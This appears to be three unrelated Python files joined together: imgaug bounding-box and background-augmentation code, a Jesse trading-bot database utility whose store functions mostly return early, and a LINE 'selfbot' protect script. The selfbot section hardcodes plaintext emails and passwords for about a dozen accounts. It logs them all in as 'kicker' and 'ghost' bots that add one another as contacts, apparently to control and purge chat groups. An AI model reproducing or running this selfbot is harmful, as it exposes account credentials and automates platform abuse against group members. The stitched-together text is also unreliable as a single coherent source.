return int(round(self.y2))
@property
def height(self):
return self.y2 - self.y1
@property
def width(self):
return self.x2 - self.x1
@property
def center_x(self):
return self.x1 + self.width/2
@property
def center_y(self):
return self.y1 + self.height/2
@property
def area(self):
return self.height * self.width
def project(self, from_shape, to_shape):
"""
Project the bounding box onto a new position on a new image.
E.g. if the bounding box is on its original image at
x1=(10 of 100 pixels) and y1=(20 of 100 pixels) and is projected onto
a new image with size (width=200, height=200), its new position will
be (x1=20, y1=40). (Analogous for x2/y2.)
This is intended for cases where the original image is resized.
It cannot be used for more complex changes (e.g. padding, cropping).
Parameters
----------
from_shape : tuple
Shape of the original image. (Before resize.)
to_shape : tuple
Shape of the new image. (After resize.)
Returns
-------
out : BoundingBox
BoundingBox object with new coordinates.
"""
if from_shape[0:2] == to_shape[0:2]:
return self.copy()
else:
from_height, from_width = from_shape[0:2]
to_height, to_width = to_shape[0:2]
do_assert(from_height > 0)
do_assert(from_width > 0)
do_assert(to_height > 0)
do_assert(to_width > 0)
x1 = (self.x1 / from_width) * to_width
y1 = (self.y1 / from_height) * to_height
x2 = (self.x2 / from_width) * to_width
y2 = (self.y2 / from_height) * to_height
if x1 == x2:
if x1 == 0:
x2 += 1
else:
x1 -= 1
if y1 == y2:
if y1 == 0:
y2 += 1
else:
y1 -= 1
return self.copy(
x1=x1,
y1=y1,
x2=x2,
y2=y2
)
def extend(self, all_sides=0, top=0, right=0, bottom=0, left=0):
return BoundingBox(
x1=self.x1 - all_sides - left,
x2=self.x2 + all_sides + right,
y1=self.y1 - all_sides - top,
y2=self.y2 + all_sides + bottom
)
def intersection(self, other, default=None):
x1_i = max(self.x1, other.x1)
y1_i = max(self.y1, other.y1)
x2_i = min(self.x2, other.x2)
y2_i = min(self.y2, other.y2)
if x1_i >= x2_i or y1_i >= y2_i:
return default
else:
return BoundingBox(x1=x1_i, y1=y1_i, x2=x2_i, y2=y2_i)
def union(self, other):
return BoundingBox(
x1=min(self.x1, other.x1),
y1=min(self.y1, other.y1),
x2=max(self.x2, other.x2),
y2=max(self.y2, other.y2)
)
def iou(self, other):
inters = self.intersection(other)
if inters is None:
return 0
else:
return inters.area / self.union(other).area
def is_fully_within_image(self, image):
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
return self.x1 >= 0 and self.x2 <= width and self.y1 >= 0 and self.y2 <= height
def is_partly_within_image(self, image):
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
img_bb = BoundingBox(x1=0, x2=width, y1=0, y2=height)
return self.intersection(img_bb) is not None
def is_out_of_image(self, image, fully=True, partly=False):
if self.is_fully_within_image(image):
return False
elif self.is_partly_within_image(image):
return partly
else:
return fully
def cut_out_of_image(self, image):
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
do_assert(height > 0)
do_assert(width > 0)
x1 = np.clip(self.x1, 0, width)
x2 = np.clip(self.x2, 0, width)
y1 = np.clip(self.y1, 0, height)
y2 = np.clip(self.y2, 0, height)
if x1 == x2:
if x1 == 0:
x2 += 1
else:
x1 -= 1
if y1 == y2:
if y1 == 0:
y2 += 1
else:
y1 -= 1
return self.copy(
x1=x1,
y1=y1,
x2=x2,
y2=y2
)
def shift(self, top=None, right=None, bottom=None, left=None):
top = top if top is not None else 0
right = right if right is not None else 0
bottom = bottom if bottom is not None else 0
left = left if left is not None else 0
return self.copy(
x1=self.x1+left-right,
x2=self.x2+left-right,
y1=self.y1+top-bottom,
y2=self.y2+top-bottom
)
def draw_on_image(self, image, color=[0, 255, 0], alpha=1.0, thickness=1, copy=True, raise_if_out_of_image=False): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
if raise_if_out_of_image and self.is_out_of_image(image):
raise Exception("Cannot draw bounding box x1=%.8f, y1=%.8f, x2=%.8f, y2=%.8f on image with shape %s." % (self.x1, self.y1, self.x2, self.y2, image.shape))
result = np.copy(image) if copy else image
for i in range(thickness):
y = [self.y1_int-i, self.y1_int-i, self.y2_int+i, self.y2_int+i]
x = [self.x1_int-i, self.x2_int+i, self.x2_int+i, self.x1_int-i]
rr, cc = draw.polygon_perimeter(y, x, shape=result.shape)
if alpha >= 0.99:
result[rr, cc, 0] = color[0]
result[rr, cc, 1] = color[1]
result[rr, cc, 2] = color[2]
else:
if result.dtype in [np.float32, np.float64]:
result[rr, cc, 0] = (1 - alpha) * result[rr, cc, 0] + alpha * color[0]
result[rr, cc, 1] = (1 - alpha) * result[rr, cc, 1] + alpha * color[1]
result[rr, cc, 2] = (1 - alpha) * result[rr, cc, 2] + alpha * color[2]
result = np.clip(result, 0, 255)
else:
input_dtype = result.dtype
result = result.astype(np.float32)
result[rr, cc, 0] = (1 - alpha) * result[rr, cc, 0] + alpha * color[0]
result[rr, cc, 1] = (1 - alpha) * result[rr, cc, 1] + alpha * color[1]
result[rr, cc, 2] = (1 - alpha) * result[rr, cc, 2] + alpha * color[2]
result = np.clip(result, 0, 255).astype(input_dtype)
return result
def extract_from_image(self, image):
pad_top = 0
pad_right = 0
pad_bottom = 0
pad_left = 0
height, width = image.shape[0], image.shape[1]
x1, x2, y1, y2 = self.x1_int, self.x2_int, self.y1_int, self.y2_int
# if the bb is outside of the image area, the following pads the image
# first with black pixels until the bb is inside the image
# and only then extracts the image area
# TODO probably more efficient to initialize an array of zeros
# and copy only the portions of the bb into that array that are
# natively inside the image area
if x1 < 0:
pad_left = abs(x1)
x2 = x2 + abs(x1)
x1 = 0
if y1 < 0:
pad_top = abs(y1)
y2 = y2 + abs(y1)
y1 = 0
if x2 >= width:
pad_right = x2 - (width - 1)
if y2 >= height:
pad_bottom = y2 - (height - 1)
if any([val > 0 for val in [pad_top, pad_right, pad_bottom, pad_left]]):
if len(image.shape) == 2:
image = np.pad(image, ((pad_top, pad_bottom), (pad_left, pad_right)), mode="constant")
else:
image = np.pad(image, ((pad_top, pad_bottom), (pad_left, pad_right), (0, 0)), mode="constant")
return image[y1:y2, x1:x2]
def to_keypoints(self):
return [
Keypoint(x=self.x1, y=self.y1),
Keypoint(x=self.x2, y=self.y1),
Keypoint(x=self.x2, y=self.y2),
Keypoint(x=self.x1, y=self.y2)
]
def copy(self, x1=None, y1=None, x2=None, y2=None):
return BoundingBox(
x1=self.x1 if x1 is None else x1,
x2=self.x2 if x2 is None else x2,
y1=self.y1 if y1 is None else y1,
y2=self.y2 if y2 is None else y2
)
class BoundingBoxesOnImage(object):
"""
Object that represents all bounding boxes on a single image.
Parameters
----------
bounding_boxes : list of BoundingBox
List of bounding boxes on the image.
shape : tuple of int
The shape of the image on which the bounding boxes are placed.
Examples
--------
>>> bbs = [
>>> BoundingBox(x1=10, y1=20, x2=20, y2=30),
>>> BoundingBox(x1=25, y1=50, x2=30, y2=70)
>>> ]
>>> bbs_oi = BoundingBoxesOnImage(bbs, shape=image.shape)
"""
def __init__(self, bounding_boxes, shape):
self.bounding_boxes = bounding_boxes
if is_np_array(shape):
self.shape = shape.shape
else:
do_assert(isinstance(shape, (tuple, list)))
self.shape = tuple(shape)
@property
def height(self):
return self.shape[0]
@property
def width(self):
return self.shape[1]
def on(self, image):
"""
Project bounding boxes from one image to a new one.
Parameters
----------
image : ndarray or tuple
New image onto which the bounding boxes are to be projected.
May also simply be that new image's shape tuple.
Returns
-------
keypoints : BoundingBoxesOnImage
Object containing all projected bounding boxes.
"""
if is_np_array(image):
shape = image.shape
else:
shape = image
if shape[0:2] == self.shape[0:2]:
return self.deepcopy()
else:
bounding_boxes = [bb.project(self.shape, shape) for bb in self.bounding_boxes]
return BoundingBoxesOnImage(bounding_boxes, shape)
def draw_on_image(self, image, color=[0, 255, 0], alpha=1.0, thickness=1, copy=True, raise_if_out_of_image=False):
"""
Draw all bounding boxes onto a given image.
Parameters
----------
image : (H,W,3) ndarray
The image onto which to draw the bounding boxes.
This image should usually have the same shape as
set in BoundingBoxesOnImage.shape.
color : int or list of ints or tuple of ints or (3,) ndarray, optional(default=[0, 255, 0])
The RGB color of all bounding boxes. If a single int `C`, then that is
equivalent to (C,C,C).
size : float, optional(default=1.0)
Alpha/transparency of the bounding box.
thickness : int, optional(default=1)
Thickness in pixels.
copy : bool, optional(default=True)
Whether to copy the image before drawing the points.
raise_if_out_of_image : bool, optional(default=False)
Whether to raise an exception if any bounding box is outside of the
image.
Returns
-------
image : (H,W,3) ndarray
Image with drawn bounding boxes.
"""
for bb in self.bounding_boxes:
image = bb.draw_on_image(
image,
color=color,
alpha=alpha,
thickness=thickness,
copy=copy,
raise_if_out_of_image=raise_if_out_of_image
)
return image
def remove_out_of_image(self, fully=True, partly=False):
bbs_clean = [bb for bb in self.bounding_boxes if not bb.is_out_of_image(self.shape, fully=fully, partly=partly)]
return BoundingBoxesOnImage(bbs_clean, shape=self.shape)
def cut_out_of_image(self):
bbs_cut = [bb.cut_out_of_image(self.shape) for bb in self.bounding_boxes if bb.is_partly_within_image(self.shape)]
return BoundingBoxesOnImage(bbs_cut, shape=self.shape)
def shift(self, top=None, right=None, bottom=None, left=None):
bbs_new = [bb.shift(top=top, right=right, bottom=bottom, left=left) for bb in self.bounding_boxes]
return BoundingBoxesOnImage(bbs_new, shape=self.shape)
############################
# Background augmentation
############################
class Batch(object):
"""
Class encapsulating a batch before and after augmentation.
Parameters
----------
images : None or (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
The images to
augment.
keypoints : None or list of KeypointOnImage
The keypoints to
augment.
data : anything
Additional data that is saved in the batch and may be read out
after augmentation. This could e.g. contain filepaths to each image
in `images`. As this object is usually used for background
augmentation with multiple processes, the augmented Batch objects might
not be returned in the original order, making this information useful.
"""
def __init__(self, images=None, keypoints=None, data=None):
self.images = images
self.images_aug = None
self.keypoints = keypoints
self.keypoints_aug = None
self.data = data
class BatchLoader(object):
"""
Class to load batches in the background.
Loaded batches can be accesses using `BatchLoader.queue`.
Parameters
----------
load_batch_func : callable
Function that yields Batch objects (i.e. expected to be a generator).
Background loading automatically stops when the last batch was yielded.
queue_size : int, optional(default=50)
Maximum number of batches to store in the queue. May be set higher
for small images and/or small batches.
nb_workers : int, optional(default=1)
Number of workers to run in the background.
threaded : bool, optional(default=True)
Whether to run the background processes using threads (true) or
full processes (false).
"""
def __init__(self, load_batch_func, queue_size=50, nb_workers=1, threaded=True):
do_assert(queue_size > 0)
do_assert(nb_workers >= 1)
self.queue = multiprocessing.Queue(queue_size)
self.join_signal = multiprocessing.Event()
self.finished_signals = []
self.workers = []
self.threaded = threaded
seeds = current_random_state().randint(0, 10**6, size=(nb_workers,))
for i in range(nb_workers):
finished_signal = multiprocessing.Event()
self.finished_signals.append(finished_signal)
if threaded:
worker = threading.Thread(target=self._load_batches, args=(load_batch_func, self.queue, finished_signal, self.join_signal, None))
else:
worker = multiprocessing.Process(target=self._load_batches, args=(load_batch_func, self.queue, finished_signal, self.join_signal, seeds[i]))
worker.daemon = True
worker.start()
self.workers.append(worker)
def all_finished(self):
"""
Determine whether the workers have finished the loading process.
Returns
-------
out : bool
True if all workers have finished. Else False.
"""
return all([event.is_set() for event in self.finished_signals])
def _load_batches(self, load_batch_func, queue, finished_signal, join_signal, seedval):
if seedval is not None:
random.seed(seedval)
np.random.seed(seedval)
seed(seedval)
for batch in load_batch_func():
do_assert(isinstance(batch, Batch), "Expected batch returned by lambda function to be of class imgaug.Batch, got %s." % (type(batch),))
queue.put(pickle.dumps(batch, protocol=-1))
if join_signal.is_set():
break
finished_signal.set()
def terminate(self):
"""
Stop all workers.
"""
self.join_signal.set()
if self.threaded:
for worker in self.workers:
worker.join()
else:
for worker, finished_signal in zip(self.workers, self.finished_signals):
worker.terminate()
finished_signal.set()
class BackgroundAugmenter(object):
"""
Class to augment batches in the background (while training on the GPU).
This is a wrapper around the multiprocessing module.
Parameters
----------
batch_loader : BatchLoader
BatchLoader object to load data in the
background.
augseq : Augmenter
An augmenter to apply to all loaded images.
This may be e.g. a Sequential to apply multiple augmenters.
queue_size : int
Size of the queue that is used to temporarily save the augmentation
results. Larger values offer the background processes more room
to save results when the main process doesn't load much, i.e. they
can lead to smoother and faster training. For large images, high
values can block a lot of RAM though.
nb_workers : "auto" or int
Number of background workers to spawn. If auto, it will be set
to C-1, where C is the number of CPU cores.
"""
def __init__(self, batch_loader, augseq, queue_size=50, nb_workers="auto"):
do_assert(queue_size > 0)
self.augseq = augseq
self.source_finished_signals = batch_loader.finished_signals
self.queue_source = batch_loader.queue
self.queue_result = multiprocessing.Queue(queue_size)
if nb_workers == "auto":
try:
nb_workers = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
nb_workers = 1
# try to reserve at least one core for the main process
nb_workers = max(1, nb_workers - 1)
else:
do_assert(nb_workers >= 1)
#print("Starting %d background processes" % (nb_workers,))
self.nb_workers = nb_workers
self.workers = []
self.nb_workers_finished = 0
self.augment_images = True
self.augment_keypoints = True
seeds = current_random_state().randint(0, 10**6, size=(nb_workers,))
for i in range(nb_workers):
worker = multiprocessing.Process(target=self._augment_images_worker, args=(augseq, self.queue_source, self.queue_result, self.source_finished_signals, seeds[i]))
worker.daemon = True
worker.start()
self.workers.append(worker)
def get_batch(self):
"""
Returns a batch from the queue of augmented batches.
If workers are still running and there are no batches in the queue,
it will automatically wait for the next batch.
Returns
-------
out : None or ia.Batch
One batch or None if all workers have finished.
"""
batch_str = self.queue_result.get()
batch = pickle.loads(batch_str)
if batch is not None:
return batch
else:
self.nb_workers_finished += 1
if self.nb_workers_finished == self.nb_workers:
return None
else:
return self.get_batch()
def _augment_images_worker(self, augseq, queue_source, queue_result, source_finished_signals, seedval):
"""
Worker function that endlessly queries the source queue (input
batches), augments batches in it and sends the result to the output
queue.
"""
np.random.seed(seedval)
random.seed(seedval)
augseq.reseed(seedval)
seed(seedval)
while True:
# wait for a new batch in the source queue and load it
try:
batch_str = queue_source.get(timeout=0.1)
batch = pickle.loads(batch_str)
# augment the batch
batch_augment_images = batch.images is not None and self.augment_images
batch_augment_keypoints = batch.keypoints is not None and self.augment_keypoints
if batch_augment_images and batch_augment_keypoints:
augseq_det = augseq.to_deterministic() if not augseq.deterministic else augseq
batch.images_aug = augseq_det.augment_images(batch.images)
batch.keypoints_aug = augseq_det.augment_keypoints(batch.keypoints)
elif batch_augment_images:
batch.images_aug = augseq.augment_images(batch.images)
elif batch_augment_keypoints:
batch.keypoints_aug = augseq.augment_keypoints(batch.keypoints)
# send augmented batch to output queue
batch_str = pickle.dumps(batch, protocol=-1)
queue_result.put(batch_str)
except QueueEmpty:
if all([signal.is_set() for signal in source_finished_signals]):
queue_result.put(pickle.dumps(None, protocol=-1))
return
def terminate(self):
"""
Terminates all background processes immediately.
This will also free their RAM.
"""
for worker in self.workers:
worker.terminate()
|
utils.py | import threading
import numpy as np
import jesse.helpers as jh
from jesse.models.Candle import Candle
from jesse.models.CompletedTrade import CompletedTrade
from jesse.models.DailyBalance import DailyBalance
from jesse.models.Order import Order
from jesse.models.Orderbook import Orderbook
from jesse.models.Ticker import Ticker
from jesse.models.Trade import Trade
from jesse.services import logger
def store_candle_into_db(exchange: str, symbol: str, candle: np.ndarray) -> None:
d = {
'id': jh.generate_unique_id(),
'symbol': symbol,
'exchange': exchange,
'timestamp': candle[0],
'open': candle[1],
'high': candle[3],
'low': candle[4],
'close': candle[2],
'volume': candle[5]
}
def async_save() -> None:
Candle.insert(**d).on_conflict_ignore().execute()
print(
jh.color(
f"candle: {jh.timestamp_to_time(d['timestamp'])}-{exchange}-{symbol}: {candle}",
'blue'
)
)
# async call
threading.Thread(target=async_save).start()
def store_ticker_into_db(exchange: str, symbol: str, ticker: np.ndarray) -> None:
return
d = {
'id': jh.generate_unique_id(),
'timestamp': ticker[0],
'last_price': ticker[1],
'high_price': ticker[2],
'low_price': ticker[3],
'volume': ticker[4],
'symbol': symbol,
'exchange': exchange,
}
def async_save() -> None:
Ticker.insert(**d).on_conflict_ignore().execute()
print(
jh.color(f'ticker: {jh.timestamp_to_time(d["timestamp"])}-{exchange}-{symbol}: {ticker}', 'yellow')
)
# async call
threading.Thread(target=async_save).start()
def store_completed_trade_into_db(completed_trade: CompletedTrade) -> None:
return
d = {
'id': completed_trade.id,
'strategy_name': completed_trade.strategy_name,
'symbol': completed_trade.symbol,
'exchange': completed_trade.exchange,
'type': completed_trade.type,
'timeframe': completed_trade.timeframe,
'entry_price': completed_trade.entry_price,
'exit_price': completed_trade.exit_price,
'take_profit_at': completed_trade.take_profit_at,
'stop_loss_at': completed_trade.stop_loss_at,
'qty': completed_trade.qty,
'opened_at': completed_trade.opened_at,
'closed_at': completed_trade.closed_at,
'entry_candle_timestamp': completed_trade.entry_candle_timestamp,
'exit_candle_timestamp': completed_trade.exit_candle_timestamp,
'leverage': completed_trade.leverage,
}
def async_save() -> None:
CompletedTrade.insert(**d).execute()
if jh.is_debugging():
logger.info(f'Stored the completed trade record for {completed_trade.exchange}-{completed_trade.symbol}-{completed_trade.strategy_name} into database.')
# async call
threading.Thread(target=async_save).start()
def store_order_into_db(order: Order) -> None:
return
d = {
'id': order.id,
'trade_id': order.trade_id,
'exchange_id': order.exchange_id,
'vars': order.vars,
'symbol': order.symbol,
'exchange': order.exchange,
'side': order.side,
'type': order.type,
'flag': order.flag,
'qty': order.qty,
'price': order.price,
'status': order.status,
'created_at': order.created_at,
'executed_at': order.executed_at,
'canceled_at': order.canceled_at,
'role': order.role,
}
def async_save() -> None:
Order.insert(**d).execute()
if jh.is_debugging():
logger.info(f'Stored the executed order record for {order.exchange}-{order.symbol} into database.')
# async call
threading.Thread(target=async_save).start()
def store_daily_balance_into_db(daily_balance: dict) -> None:
return
def async_save():
DailyBalance.insert(**daily_balance).execute()
if jh.is_debugging():
logger.info(f'Stored daily portfolio balance record into the database: {daily_balance["asset"]} => {jh.format_currency(round(daily_balance["balance"], 2))}'
)
# async call
threading.Thread(target=async_save).start()
def store_trade_into_db(exchange: str, symbol: str, trade: np.ndarray) -> None:
return
d = {
'id': jh.generate_unique_id(),
'timestamp': trade[0],
'price': trade[1],
'buy_qty': trade[2],
'sell_qty': trade[3],
'buy_count': trade[4],
'sell_count': trade[5],
'symbol': symbol,
'exchange': exchange,
}
def async_save() -> None:
Trade.insert(**d).on_conflict_ignore().execute()
print(
jh.color(
f'trade: {jh.timestamp_to_time(d["timestamp"])}-{exchange}-{symbol}: {trade}',
'green'
)
)
# async call
threading.Thread(target=async_save).start()
def store_orderbook_into_db(exchange: str, symbol: str, orderbook: np.ndarray) -> None:
return
d = {
'id': jh.generate_unique_id(),
'timestamp': jh.now_to_timestamp(),
'data': orderbook.dumps(),
'symbol': symbol,
'exchange': exchange,
}
def async_save() -> None:
Orderbook.insert(**d).on_conflict_ignore().execute()
print(
jh.color(
f'orderbook: {jh.timestamp_to_time(d["timestamp"])}-{exchange}-{symbol}: [{orderbook[0][0][0]}, {orderbook[0][0][1]}], [{orderbook[1][0][0]}, {orderbook[1][0][1]}]',
'magenta'
)
)
# async call
threading.Thread(target=async_save).start()
def fetch_candles_from_db(exchange: str, symbol: str, start_date: int, finish_date: int) -> tuple:
candles_tuple = tuple(
Candle.select(
Candle.timestamp, Candle.open, Candle.close, Candle.high, Candle.low,
Candle.volume
).where(
Candle.timestamp.between(start_date, finish_date),
Candle.exchange == exchange,
Candle.symbol == symbol
).order_by(Candle.timestamp.asc()).tuples()
)
return candles_tuple
|
53moo.py | # -*- coding: utf-8 -*-
'''
© 2018SelfBot ProtectV3.5
'''
from important import *
# Setup Argparse
parser = argparse.ArgumentParser(description='© 2018SelfBot ProtectV3.5')
parser.add_argument('-t', '--token', type=str, metavar='', required=False, help='Token | Example : Exxxx')
parser.add_argument('-e', '--email', type=str, default='', metavar='', required=False, help='Email Address | Example : example@xxx.xx')
parser.add_argument('-p', '--passwd', type=str, default='', metavar='', required=False, help='Password | Example : xxxx')
parser.add_argument('-a', '--appName', type=str, default='', metavar='', required=False, choices=list(ApplicationType._NAMES_TO_VALUES), help='Application Type | Example : CHROMEOS')
parser.add_argument('-s', '--systemname', type=str, default='', metavar='', required=False, help='System Name | Example : Chrome_OS')
parser.add_argument('-c', '--channelid', type=str, default='', metavar='', required=False, help='Channel ID | Example : 1341209950')
parser.add_argument('-T', '--traceback', type=str2bool, nargs='?', default=False, metavar='', required=False, const=True, choices=[True, False], help='Using Traceback | Use : True/False')
parser.add_argument('-S', '--showqr', type=str2bool, nargs='?', default=False, metavar='', required=False, const=True, choices=[True, False], help='Show QR | Use : True/False')
args = parser.parse_args()
# Login line
start_runtime = datetime.now()
line = LINE("smoottew008@gmail.com","avios111",appType="WIN10")
print ("===============[ADMIN LOGIN]===============\n")
kicker = LINE("rdn05495@ebbob.com","avios111",appType="WIN10")
print ("===============[Kicker 1 LOGIN SUKSES]===============\n")
kicker2 = LINE("smootte12@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 2 LOGIN SUKSES]===============\n")
kicker3 = LINE("smoottew21@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 3 LOGIN SUKSES]===============\n")
kicker4 = LINE("smoottew11@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 4 LOGIN SUKSES]===============\n")
kicker5 = LINE("smoottew12@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 5 LOGIN SUKSES]===============\n")
kicker6 = LINE("smoottew13@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 6 LOGIN SUKSES ]===============\n")
kicker7 = LINE("smoottew14@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 7 LOGIN SUKSES]===============\n")
kicker8 = LINE("smootte11@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 8 LOGIN SUKSES]===============\n")
kicker9 = LINE("ohx74581@cndps.com","avios111",appType="WIN10")
print ("===============[Kicker 9 LOGIN SUKSES]===============\n")
kicker10 = LINE("smoottew20@gmail.com","avios111",appType="WIN10")
print ("===============[Kicker 10 LOGIN SUKSES]===============\n")
g1 = LINE("dpf16683@cndps.com","avios111",appType="WIN10")
print ("===============[Ghost LOGIN SUKSES]===============\n")
client = line
myMid = line.profile.mid
creator = ["uabeb419b286e211b3716ce5062dc19d0"]#Mid ตัวหลัก
owner = ["uabeb419b286e211b3716ce5062dc19d0"]#Mid ตัวหลัก
admin = ["uabeb419b286e211b3716ce5062dc19d0"]#Mid ตัวหลัก
staff = ["uabeb419b286e211b3716ce5062dc19d0"]#Mid ตัวหลัก
Amid = kicker.getProfile().mid
Bmid = kicker2.getProfile().mid
Cmid = kicker3.getProfile().mid
Dmid = kicker4.getProfile().mid
Emid = kicker5.getProfile().mid
Fmid = kicker6.getProfile().mid
Gmid = kicker7.getProfile().mid
Hmid = kicker8.getProfile().mid
Imid = kicker9.getProfile().mid
Jmid = kicker10.getProfile().mid
KAC = [kicker,kicker2,kicker3,kicker3,kicker5,kicker6,kicker7,kicker8,kicker9,kicker10]
ABC = [kicker,kicker2,kicker3,kicker3,kicker5,kicker6,kicker7,kicker8,kicker9,kicker10]
Bots = [myMid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid]
#Autoadd
armylist = [myMid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid]
botlist = [line,kicker,kicker2,kicker3,kicker3,kicker5,kicker6,kicker7,kicker8,kicker9,kicker10]
#Autoadd
Ariff = creator + admin + owner + staff + Bots
programStart = time.time()
oepoll = OEPoll(line)
tmp_text = []
lurking = {}
protectqr = []
protectkick = []
protecARoin = []
protectinvite = []
protectcancel = []
protectcanceljs = []
protectantijs = []
ghost = []
numlist= {}
zxcvzx = myMid
with open('protectcancel.json', 'r') as fp:
protectcancel = json.load(fp)
with open('protectcanceljs.json', 'r') as fp:
protectcanceljs = json.load(fp)
with open('protectantijs.json', 'r') as fp:
protectantijs = json.load(fp)
with open('ghost.json', 'r') as fp:
ghost = json.load(fp)
with open('protectinvite.json', 'r') as fp:
protectinvite = json.load(fp)
Setbot3 = codecs.open("wait.json","r","utf-8")
wait = json.load(Setbot3)
settings = livejson.File('setting.json', True, False, 4)
numlist= {}
bool_dict = {
True: ['Yes', 'Active', 'Success', 'Open', 'On'],
False: ['No', 'Not Active', 'Failed', 'Close', 'Off']
}
##### ADD BOT #####
for bottt in botlist:
for bott in armylist:
try:
bottt.findAndAddContactsByMid(bott)
except:
pass
responsename1 = kicker.getProfile().displayName
responsename2 = kicker2.getProfile().displayName
responsename3 = kicker3.getProfile().displayName
responsename4 = kicker4.getProfile().displayName
responsename5 = kicker5.getProfile().displayName
responsename6 = kicker6.getProfile().displayName
responsename7 = kicker7.getProfile().displayName
responsename8 = kicker8.getProfile().displayName
responsename9 = kicker9.getProfile().displayName
responsename10 = kicker10.getProfile().displayName
# Backup profile
profile = line.getContact(myMid)
settings["myProfile"]["displayName"] = profile.displayName
settings["myProfile"]["statusMessage"] = profile.statusMessage
settings["myProfile"]["pictureStatus"] = profile.pictureStatus
cont = line.getContact(myMid)
settings["myProfile"]["videoProfile"] = cont.videoProfile
coverId = line.getProfileDetail()["result"]["objectId"]
settings["myProfile"]["coverId"] = coverId
# Check Json Data
def delete_log():
ndt = datetime.now()
for data in msg_dict:
if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > datetime.timedelta(1):
del msg_dict[msg_id]
def restartProgram():
print ('##----- PROGRAM RESTARTED -----##')
python = sys.executable
os.execl(python, python, *sys.argv)
def logError(error, write=True):
errid = str(random.randint(100, 999))
filee = open('tmp/errors/%s.txt'%errid, 'w') if write else None
if args.traceback: traceback.print_tb(error.__traceback__)
if write:
traceback.print_tb(error.__traceback__, file=filee)
filee.close()
with open('errorLog.txt', 'a') as e:
e.write('\n%s : %s'%(errid, str(error)))
print ('++ Error : {error}'.format(error=error))
def command(text):
pesan = text.lower()
if settings['setKey']['status']:
if pesan.startswith(settings['setKey']['key']):
cmd = pesan.replace(settings['setKey']['key'],'')
else:
cmd = 'Undefined command'
else:
cmd = text.lower()
return cmd
def changeVideoAndPictureProfile(pict, vids):
try:
files = {'file': open(vids, 'rb')}
obs_params = line.genOBSParams({'oid': myMid, 'ver': '2.0', 'type': 'video', 'cat': 'vp.mp4'})
data = {'params': obs_params}
r_vp = line.server.postContent('{}/talk/vp/upload.nhn'.format(str(line.server.LINE_OBS_DOMAIN)), data=data, files=files)
if r_vp.status_code != 201:
return "Failed update profile"
line.updateProfilePicture(pict, 'vp')
return "Success update profile"
except Exception as e:
raise Exception("Error change video and picture profile {}".format(str(e)))
def genImageB64(path):
with open(path, 'rb') as img_file:
encode_str = img_file.read()
b64img = base64.b64encode(encode_str)
return b64img.decode('utf-8')
def genUrlB64(url):
return base64.b64encode(url.encode('utf-8')).decode('utf-8')
def removeCmd(text, key=''):
if key == '':
setKey = '' if not settings['setKey']['status'] else settings['setKey']['key']
else:
setKey = key
text_ = text[len(setKey):]
sep = text_.split(' ')
return text_[len(sep[0] + ' '):]
def multiCommand(cmd, list_cmd=[]):
if True in [cmd.startswith(c) for c in list_cmd]:
return True
else:
return False
def replaceAll(text, dic):
try:
rep_this = dic.items()
except:
rep_this = dic.iteritems()
for i, j in rep_this:
text = text.replace(i, j)
return text
def help():
key = '' if not settings['setKey']['status'] else settings['setKey']['key']
with open('help.txt', 'r') as f:
text = f.read()
helpMsg = text.format(key=key.title())
return helpMsg
def helpbot():
with open('helpbot.txt', 'r') as f:
text = f.read()
helpMsg1 = text.format()
return helpMsg1
def parsingRes(res):
result = ''
textt = res.split('\n')
for text in textt:
if True not in [text.startswith(s) for s in ['╭', '├', '│', '╰']]:
result += '\n│ ' + text
else:
if text == textt[0]:
result += text
else:
result += '\n' + text
return result
def sendMentionxd(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
line.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
line.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def Musik(to):
contentMetadata={'previewUrl': "http://dl.profile.line-cdn.net/"+line.getContact(myMid).picturePath, 'i-installUrl': 'http://itunes.apple.com/app/linemusic/id966142320', 'type': 'mt', 'subText': line.getContact(myMid).statusMessage if line.getContact(myMid).statusMessage != '' else 'creator By rat |ID LINE|\njamekillover', 'a-installUrl': 'market://details?id=jp.linecorp.linemusic.android', 'a-packageName': 'jp.linecorp.linemusic.android', 'countryCode': 'JP', 'a-linkUri': 'linemusic://open?target=track&item=mb00000000016197ea&subitem=mt000000000d69e2db&cc=JP&from=lc&v=1', 'i-linkUri': 'linemusic://open?target=track&item=mb00000000016197ea&subitem=mt000000000d69e2db&cc=JP&from=lc&v=1', 'text': line.getContact(myMid).displayName, 'id': 'mt000000000d69e2db', 'linkUri': 'https://music.me.me/launch?target=track&item=mb00000000016197ea&subitem=mt000000000d69e2db&cc=JP&from=lc&v=1','MSG_SENDER_ICON': "https://os.me.naver.jp/os/p/"+myMid,'MSG_SENDER_NAME': line.getContact(myMid).displayName,}
return line.sendMessage(to, line.getContact(myMid).displayName, contentMetadata, 19)
def sendMention1(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker.sendMessage(to, "[ INFO ] Error :\n" + str(error))
